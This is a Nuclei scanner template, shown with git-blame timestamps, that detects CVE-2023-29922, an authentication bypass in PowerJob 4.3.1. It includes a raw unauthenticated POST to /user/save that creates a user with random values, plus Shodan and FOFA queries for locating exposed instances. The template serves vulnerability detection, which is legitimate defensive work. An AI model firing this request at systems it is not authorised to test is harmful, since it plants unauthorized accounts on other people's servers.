2023-04-26 16:25:53 +00:00
|
|
|
id: CVE-2023-29922
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: PowerJob V4.3.1 - Authentication Bypass
|
|
|
|
author: Co5mos
|
2023-07-11 19:49:27 +00:00
|
|
|
severity: medium
|
2023-04-26 16:25:53 +00:00
|
|
|
description: |
|
|
|
|
PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the application.
|
2023-09-06 11:43:37 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patch or upgrade to a patched version of PowerJob V4.3.1.
|
2023-04-26 16:25:53 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/PowerJob/PowerJob/issues/585
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-29922
|
|
|
|
classification:
|
2023-07-11 19:49:27 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
|
|
|
|
cvss-score: 5.3
|
2023-04-26 16:25:53 +00:00
|
|
|
cve-id: CVE-2023-29922
|
|
|
|
cwe-id: CWE-1188
|
2024-04-08 11:34:33 +00:00
|
|
|
epss-score: 0.00791
|
|
|
|
epss-percentile: 0.79603
|
2023-09-06 11:43:37 +00:00
|
|
|
cpe: cpe:2.3:a:powerjob:powerjob:4.3.1:*:*:*:*:*:*:*
|
2023-04-26 16:25:53 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:43:37 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: powerjob
|
|
|
|
product: powerjob
|
2023-09-06 11:43:37 +00:00
|
|
|
shodan-query: html:"PowerJob"
|
|
|
|
fofa-query: app="PowerJob"
|
2023-04-26 16:25:53 +00:00
|
|
|
tags: cve,cve2023,auth-bypass,powerjob
|
|
|
|
variables:
|
|
|
|
str: "{{rand_base(6)}}"
|
|
|
|
|
2023-04-27 11:31:18 +00:00
|
|
|
http:
|
2023-04-26 16:25:53 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /user/save HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{"username":"{{str}}","phone":"{{str}}","email":"{{str}}","webHook":"{{str}}"}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2023-04-26 19:52:48 +00:00
|
|
|
- '"success":true'
|
|
|
|
- '"data":null'
|
|
|
|
condition: and
|
2023-04-26 16:25:53 +00:00
|
|
|
|
2023-04-26 19:49:04 +00:00
|
|
|
- type: word
|
2023-04-26 16:25:53 +00:00
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2023-04-27 11:31:18 +00:00
|
|
|
- 200
|
2024-01-14 14:05:19 +00:00
|
|
|
# digest: 4b0a00483046022100bfbf1a8c87f9cb5f380257f32742fe3fbfc2ca545f5b61c3df52cb89048fb3b6022100a84526343d726f724f54e529c4771d5ee2037c66a32041da550cb9f158ef4fb1:922c64590222798bb761d5b6d8e72950
|